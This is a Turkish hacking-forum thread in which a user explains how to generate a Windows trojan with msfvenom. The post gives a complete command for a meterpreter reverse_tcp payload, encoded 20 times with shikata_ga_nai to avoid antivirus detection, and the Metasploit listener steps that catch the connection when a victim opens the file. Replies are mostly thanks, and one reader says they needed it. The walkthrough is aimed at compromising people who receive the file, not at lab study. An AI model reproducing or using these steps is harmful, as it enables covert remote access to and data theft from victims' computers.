Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo

SeNZeRo · 4 Kas 2018

Merhaba arkadaşlar. Bugün bir çok kişinin baş belası olan port açma derdini ortadan kaldıracağız. Métasploitin alt dalı olarak sunduğu Msfvenom aracını kullanarak trojan (rat / backdoor) oluşturacağız. Bu işlemi yaparken de port açmayacağız.

Msfvenom Nedir Ve İşe Yarar ?

Msfvenom aracı métasploitin alt dalında yürütülen bir projedir. Daha önceden backdoor oluşturmak için msfpayload aracı kullanılıyordu. Métasploitin msfpayloada verdiği desteğini kesmesi üzerine yeni bir araç olarak msfvenomu çıkarttı. Msfvenom aracı Msfpayload ve Msfencode araçlarının birleşmiş halidir. Bu sayede tek araçla bir çok işi halledebiliyoruz.

Msfvenom aracı hakkında ayrıntılı bilgi için terminale aşağıdaki komutu yazınız.

Kod:

msfvenom -h

Kullanılan bazı parametreler;

-l = Payload, encoder,npos modül tüplerini listeler.
-p = Kullanacağımız payloadı seçmemize yarar.
-f = Çıktının yani oluşturacağımız trojanın hangi türde olacağını seçmemize yarar. Örneğin .exe, dll, asp, vba vs gibi.
-e = Oluşturacağımız trojana bir encoder ekleyerek antivirüslere yakalanmamasını sağlar.
-a = Payloadın çalışacağı mimariyi seçmemize yarar. Desteklenen bazı mimariler x86 and x64, ARM, PPC Sparc dir.
-o = Oluşturduğumuz trojanın nereye çıkacağını belirtmeye yarar.
-b = Kötü karakterleri (bad characters) temizler.
-n = Oluşturulan trojanın başına nopsled ekler.
-s = Oluşturulan trojanın memory alanı boyutunu byte olarak belirleyebiliriz.
-i = Encoding işleminin kaç kez tekrarlanacağını belirtir.
-c = Birleştirilecek shell code' yi belirtmeye yarar.
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engeller.

Yukarıda trojanı oluştururken kullandığımız parametreleri listeledim. Şimdi de trojanımızı oluşturmaya geçelim.

Genel olarak trojan oluşturma kodu:

Kod:

msfvenom p <payload adı> --payload-options (seçtiğimiz payloadın ayarlarını yapmamızı sağlar)

Öncelikle payload türümüzü seçmeliyiz. Hangi sistem için yapacak isek onun payloadını seçmeliyiz. Örnek olarak birkaç payload türü:

Windows

Kod:

-p windows/meterpreter/reverse_tcp

Linux

Kod:

-p linux/x86/meterpreter/reverse_tcp

PHP

Kod:

-p php/meterpreter_reverse_tcp

Python

Kod:

-p cmd/unix/reverse_python

Bash

Kod:

-p cmd/unix/reverse_bash

Andorid

Kod:

p android/meterpreter/reverse_tcp

Ben örnek olarak windows için .exe bir trojan oluşturacağım. Payloadımızı seçtik -p windows/meterpreter/reverse_tcp Payloadı seçtikten sonra LHOST ve LPORT değerlerini yani trojanı attığımız kişi trojanı açarsa bağlantının hangi ip ye gelmesini istediğimizi yazacağız. Bunun için terminale ifconfig yazarak kendi ip adresimizi alıyoruz.

Bu işlemleri yaptıktan sonra komutumuz şu hale geldi:

Kod:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipadresimiz LPORT=4444

Bundan sonra konunun başında belirtmiş olduğum komutları kullanarak trojanın ayarlarını istediğiniz şekilde yapabilirsiniz. Ben örnek olarak aşağıdaki şekilde yapacağım.

Kod:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.151 LPORT=443 -f exe -a x86 -o /root/Masaüstü/trojan.exe --platform windows -e x86/shikata_ga_nai -i 20

Trojanımızı başarılı bir şekilde oluşturduk. Şimdi de oluşturduğumuz trojanı dinlemeye alalım. Yani trojanı birisi açtığında bağlantının gelmesini sağlayacağız.

Bunun için métasploiti msfconsole yazarak çalıştırıyoruz. Métasploit açıldıktan sonra aşağıdaki adımları izliyoruz.

use exploit/multi/handler >>> Komutu ile dinleme modülüne giriyoruz.
set payload <seçtiğimiz payload> >>> İlk başta seçtiğimiz payloadı yazıyoruz. Ben windows/meterpreter/reverse_tcp seçmiştim.
set LHOST=<kendi ip adresimizi yazıyoruz> >>> Trojanı oluştururken ifconfig komutu ile aldığımız ip adresimizi yazıyoruz.
set LPORT=443 >>> Yazdığımız portu yazıyoruz.
exploit >>> Dinleme işlemini başlatır.

Böylelikle dinleme moduna almış olduk. Attığımız trojanı birisi açarsa buraya düşecek ve istediğiniz bilgileri alabileceksiniz. Konuya trojan açıldıktan, oturum geldikten sonra neler yapabileceğimizi ve istediğimiz verileri nasıl alabileceğimizi de ekleyeceğim. İyi formlar.

нydrαтнαlleѕ · 4 Kas 2018

elinize sağlık hocam

ch_arli41 · 4 Kas 2018

Eline sağlık güzel konu

oldnco · 4 Kas 2018

elinize sağlık hocam

'Creative · 4 Kas 2018

Elinize Sağlık Hocam

Whiteht · 4 Kas 2018

ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum

:

SeNZeRo · 4 Kas 2018

HydraThalles' Alıntı:
elinize sağlık hocam

ch_arli41' Alıntı:
Eline sağlık güzel konu

oldnco' Alıntı:
elinize sağlık hocam

THE HACKER 21' Alıntı:
Elinize Sağlık Hocam

Whiteht' Alıntı:
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum :

Teşekkür ederim, sağolun.

GHOST CLOUD · 4 Kas 2018

Elinize sağlık hocam.

"Tranquila · 4 Kas 2018

ellerine sağlık ihtiyacım vardı

Sontigin · 4 Kas 2018

eline sağlık komutanım

Rospovà · 4 Kas 2018

Eline sağlık dostum.

StarsScream · 4 Kas 2018

Elinize Sağlık

ATABÖRÜ · 4 Kas 2018

Ellerine emeğine sağlık )

cnaxe · 4 Kas 2018

Sağolun hocam.

asi drason · 4 Kas 2018

Ellerine Sağlk. Deneyen Var Mı?

Dostum Videolu anlatım yapabilirmsiin?

ibobaba27 · 4 Kas 2018

Ellerine emeğine sağlık hocam

cewl · 4 Kas 2018

konu basliqi port acmadan dimi ?

SeNZeRo · 6 Kas 2018

Sağolun arkadaşlar. Zaman bulabilirsem videolu anlatımını da yaparım.
cewl evet port açmadan yazıyor.

Wonkaa · 6 Kas 2018

SeNZeRo' Alıntı:
Sağolun arkadaşlar. Zaman bulabilirsem videolu anlatımını da yaparım.
cewl evet port açmadan yazıyor.

öncelikle teşekkür ederim

port açmadan demişsiniz çok merak ettim mümkünse videolu anlatımınızıda isteriz hocam

tekrardan teşekkürler üstad

TURKISH STARS · 6 Kas 2018

Başarılı gerçekten.

Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo

Özel Üye

İSTİHBARAT!

Özel Üye

Uzman üye

Kıdemli Üye

Uzman üye

Özel Üye

Kıdemli Üye

Uzman üye

Üye

Kıdemli Üye

Katılımcı Üye

Kıdemli Üye

Üye

Uzman üye

Katılımcı Üye

Kıdemli Üye

Özel Üye

Katılımcı Üye

Uzman üye